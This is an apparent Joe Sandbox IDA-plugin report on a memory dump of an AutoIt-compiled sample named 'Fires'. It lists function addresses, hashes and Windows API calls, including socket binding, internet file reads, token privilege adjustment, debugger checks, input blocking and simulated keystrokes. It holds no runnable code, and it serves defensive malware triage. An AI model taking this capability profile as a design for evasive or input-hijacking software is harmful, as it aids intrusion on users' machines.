Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: f444e431babe1a6b57b1e65f6888a9c2301f81a75e93484d590319ca32599bdb
Instruction ID: 7514bc8a2af767d8488104f28cee1f2023065e0743bf612845730827695dcd68
Opcode Fuzzy Hash: f444e431babe1a6b57b1e65f6888a9c2301f81a75e93484d590319ca32599bdb
Instruction Fuzzy Hash: 794110B194120AEFCF15DF68C949AEE7BB5EF15310F184056E406A2191EB31DE84CF71

Function 00DC2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DC3AD7
Part of subcall function 00DC3AAB: _wcslen.LIBCMT ref: 00DC3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DC22BA
WSAGetLastError.WSOCK32 ref: 00DC22E1
bind.WSOCK32(00000000,?,00000010), ref: 00DC2338
WSAGetLastError.WSOCK32 ref: 00DC2343
closesocket.WSOCK32(00000000), ref: 00DC2372

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: c66d4560d455773901d2a61340588904fe8245b49fd66aa9e536dca4c9f7098b
Instruction ID: 90437b000e3bd9e0072e8d3e3400067e11c30ed237ad6abc953bfa58c7631d8d
Opcode Fuzzy Hash: c66d4560d455773901d2a61340588904fe8245b49fd66aa9e536dca4c9f7098b
Instruction Fuzzy Hash: 2151AF75A00210AFEB10AF24C886F2AB7A5EB45754F18849CF9459F3D3CB75AD42CBB1

Function 00DD26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00DD275C
IsWindowEnabled.USER32 ref: 00DD276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00DD2777
IsIconic.USER32 ref: 00DD2785
IsZoomed.USER32 ref: 00DD2793

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e5a675bc0d6da1ee8e91084baa1fbabe012082e84e5b685a44f5dec343018f1c
Instruction ID: 8579e8e68f9f65427977febd5fe74967f9bf51e74dc4e074d81b74099cdca4eb
Opcode Fuzzy Hash: e5a675bc0d6da1ee8e91084baa1fbabe012082e84e5b685a44f5dec343018f1c
Instruction Fuzzy Hash: 3021E231701210AFD7219F26D844B6A7BA9FFA5314F19806AE84ACB351C771ED42CBB1

Function 00DBD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00DBD8CE
GetLastError.KERNEL32(?,00000000), ref: 00DBD92F
SetEvent.KERNEL32(?,?,00000000), ref: 00DBD943

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 3beac80cff7dd83495d315400d5f716b0c3babb9229f858fc83842b5a2bf81d8
Instruction ID: 0f0542ac5eddc9680cc1f71a8de941a748b17385b8957925fa96466424b1e998
Opcode Fuzzy Hash: 3beac80cff7dd83495d315400d5f716b0c3babb9229f858fc83842b5a2bf81d8
Instruction Fuzzy Hash: CB218CB5900705EBEB209F65D884BAAB7F9EF40314F14442AE686A2251E770EA04CFB0

Function 00DAE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00D846AC), ref: 00DAE482
GetFileAttributesW.KERNEL32(?), ref: 00DAE491
FindFirstFileW.KERNEL32(?,?), ref: 00DAE4A2
FindClose.KERNEL32(00000000), ref: 00DAE4AE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: b33bd8f38c4c36758b052f19449f284f0870e77fb11141e13e2e7d0c4b58d01d
Instruction ID: b5eda52c5a4d940ef244808a2807df2a7f726285d035e5f3b8bd441b8ea56b52
Opcode Fuzzy Hash: b33bd8f38c4c36758b052f19449f284f0870e77fb11141e13e2e7d0c4b58d01d
Instruction Fuzzy Hash: 30F0A030411B205796106738AC0D8AA7B6EAE07335B544702F876C22E0D7B8D99586B9

Function 00D9E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00D9E5F8

Strings

%.3d, xrefs: 00D9E603
X64, xrefs: 00D9E680

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 9fc399c02e4f31552682e31805cec1dc579027978b9cc200877e551a113708d9
Instruction ID: 271ed3ef78263ef64a70a8a52823827f133165964b2298ecb6a93d29afdf5c7d
Opcode Fuzzy Hash: 9fc399c02e4f31552682e31805cec1dc579027978b9cc200877e551a113708d9
Instruction Fuzzy Hash: 9AD012B1C04208D6CF80D7909D49DB9737CBB18701F104C52FD86E1040E634D9489731

Function 00D72992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00D72A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00D72A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00D72AA1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b1e5b6e6d14127df824f0fa25b7705bf05c0af7e95006a711141901eecf07fab
Instruction ID: 33e4927af44a66bcdc8833943a81b66ad70586e7d7304a98bb45f35d6038eeca
Opcode Fuzzy Hash: b1e5b6e6d14127df824f0fa25b7705bf05c0af7e95006a711141901eecf07fab
Instruction Fuzzy Hash: 0131B5759012289BCB21DF68DD8979DBBB8AF18310F5082DAE80CA6261E7309F858F55

Function 00DA2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00D6014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D609D8
Part of subcall function 00D6014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D609F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DA205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DA2087
GetLastError.KERNEL32 ref: 00DA2097

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 3003b6e00c3c8acbc9758848dbf007621b2a7aa95ac19b3da2c20d73cb726504
Instruction ID: 438741af466fbacbb1e99e42e29f4c646dbb2c88067be31b6dd479d829d92487
Opcode Fuzzy Hash: 3003b6e00c3c8acbc9758848dbf007621b2a7aa95ac19b3da2c20d73cb726504
Instruction Fuzzy Hash: 91118FB1414305AFD7289F54DC86D7BBBB9EB45710B20851EE05697251DB70BC41CA74

Function 00D65058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00D6502E,?,00E098D8,0000000C,00D65185,?,00000002,00000000), ref: 00D65079
TerminateProcess.KERNEL32(00000000,?,00D6502E,?,00E098D8,0000000C,00D65185,?,00000002,00000000), ref: 00D65080
ExitProcess.KERNEL32 ref: 00D65092

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: cf25803bee8d8cd4bd07359e35ddb31f2572d93d38dd44ea2e8caf030946db46
Instruction ID: 42034348a17e29b9946c26db21b0ec04b0475279babaf4e5a32237723b5b6cd2
Opcode Fuzzy Hash: cf25803bee8d8cd4bd07359e35ddb31f2572d93d38dd44ea2e8caf030946db46
Instruction Fuzzy Hash: D8E0EC31012648AFCF216F54ED09E583B6AEF50381F154055F9499A231EB35ED82DFF0

Function 00DAECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00DAED04

Strings

DOWN, xrefs: 00DAECE9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: d7cc515a2ebe922f72fef2bb66c757b418a5ae479430834111c495a347b4f9da
Instruction ID: 4666ad352844cc75caf24e2e36f49567c7460c19f0c6456a36b60c19e2900cda
Opcode Fuzzy Hash: d7cc515a2ebe922f72fef2bb66c757b418a5ae479430834111c495a347b4f9da
Instruction Fuzzy Hash: D9E08C261AE72239FD0421287C06EF6434C8F23B34B151246F800E40C0ED945C8294B8

Function 00D9E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00D9E664

Strings

X64, xrefs: 00D9E680

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: d4c89ab96847f20ffd9bd1ac12b71b8e9260d2a7739b0661c3b01c6f351dc136
Instruction ID: c7f40638944b6c368383e198e6060ab2dbe3ad6524c2cef278c4df41ba964629
Opcode Fuzzy Hash: d4c89ab96847f20ffd9bd1ac12b71b8e9260d2a7739b0661c3b01c6f351dc136
Instruction Fuzzy Hash: 6AD0C9F480111DEACF80CB50EC88DD9737CBB04304F100A52F546E2100D730D6488B20

Function 00DB41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DC52EE,?,?,00000035,?), ref: 00DB4229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DC52EE,?,?,00000035,?), ref: 00DB4239

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b7a86f3952811b4130cd7a7f4550c25995e0f29c68bf301371c2fb06c45e7c61
Instruction ID: 8f4628297fac075ec5e3d6f655997fd11ea1fa13cc52771d255b1a72fd1949a8
Opcode Fuzzy Hash: b7a86f3952811b4130cd7a7f4550c25995e0f29c68bf301371c2fb06c45e7c61
Instruction Fuzzy Hash: 58F0E5306013286AEB206666AC4DFEB3A6EEFC5771F000176F505D3281D9709900C7B5

Function 00DABBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DABC24
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00DABC37

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: d44cbbd08b731be90cf0d25f897042700c2e78b0feda1e2878806885a3e970d8
Instruction ID: 510d9bbd68c16bda6943cb3d7a371761ae71f128f2299b9f853c6503e9b2f6c7
Opcode Fuzzy Hash: d44cbbd08b731be90cf0d25f897042700c2e78b0feda1e2878806885a3e970d8
Instruction Fuzzy Hash: 78F06D7080024DABDF019FA0C805BBEBBB0FF04319F04800AF951E5192C379C212DFA4

Function 00DA1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DA1B48), ref: 00DA1A20
CloseHandle.KERNEL32(?,?,00DA1B48), ref: 00DA1A35

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 06812b080a7426cd1265836b0d3864a56db80580df478a833c00148930369e25
Instruction ID: a6ec8e122fbab3cd36da0953f38907200f8275402a9514a4deadcc860e350cc4
Opcode Fuzzy Hash: 06812b080a7426cd1265836b0d3864a56db80580df478a833c00148930369e25
Instruction Fuzzy Hash: A7E09A76055710AFEB252B10EC05E777BADEB05311F14891EF5A6C0470DA666C91DA60

Function 00DBF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00DBF51A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 8aee4e5c53a043fbff0b5f8dcfa7748f8139c9847c6c47ec698f3e4ab2cc934a
Instruction ID: a2ec045f449ff703c15a210756f4845dba782c1b8586b7650c64adf00b0d5fe4
Opcode Fuzzy Hash: 8aee4e5c53a043fbff0b5f8dcfa7748f8139c9847c6c47ec698f3e4ab2cc934a
Instruction Fuzzy Hash: AEE04831210204AFC7209F69D804996F7D8EFA4761F048426F84AC7351D670F9408BB0

Function 00D60D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00D6075E), ref: 00D60D4A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7731035a859bcf612cec402c3161d8ca2c91ae4c40711c050f927f71fa14fe2
Instruction ID: 78b12981499175d64f9a409c872384d566150f47383eca15d7971fd2f2424d20
Opcode Fuzzy Hash: f7731035a859bcf612cec402c3161d8ca2c91ae4c40711c050f927f71fa14fe2
Instruction Fuzzy Hash:

Function 00DC353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DC358D
DeleteObject.GDI32(00000000), ref: 00DC35A0
DestroyWindow.USER32 ref: 00DC35AF
GetDesktopWindow.USER32 ref: 00DC35CA
GetWindowRect.USER32(00000000), ref: 00DC35D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DC3700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DC370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC3755
GetClientRect.USER32(00000000,?), ref: 00DC3761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DC379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC37BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC37D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC37DD
GlobalLock.KERNEL32(00000000), ref: 00DC37E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC37F5
GlobalUnlock.KERNEL32(00000000), ref: 00DC37FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC3805
GlobalFree.KERNEL32(00000000), ref: 00DC3810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC3822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00DE0C04,00000000), ref: 00DC3838
GlobalFree.KERNEL32(00000000), ref: 00DC3848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DC386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DC388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC38AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DC3A9C

Strings

AutoIt v3, xrefs: 00DC374F
DISPLAY, xrefs: 00DC38FF
static, xrefs: 00DC3797, 00DC38EE
, xrefs: 00DC3A22

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 820a6b1c2caab9ed15afbe050d7f4a31f8efbe07ec8847ed9cb1d62113bb1733
Instruction ID: c9818b02d36a94d708e582108afa8e3d36a3c93684fb026e968ae8c67c3adb88
Opcode Fuzzy Hash: 820a6b1c2caab9ed15afbe050d7f4a31f8efbe07ec8847ed9cb1d62113bb1733
Instruction Fuzzy Hash: 37025C71911206AFDB14DF64CD89EAE7BBAEB48310F148159F915AB2A0CB74EE41CF70

Function 00D41625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00D416B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00D82B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D82B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D82F85

Part of subcall function 00D41802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D41488,?,00000000,?,?,?,?,00D4145A,00000000,?), ref: 00D41865

SendMessageW.USER32(?,00001053), ref: 00D82FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D82FD8
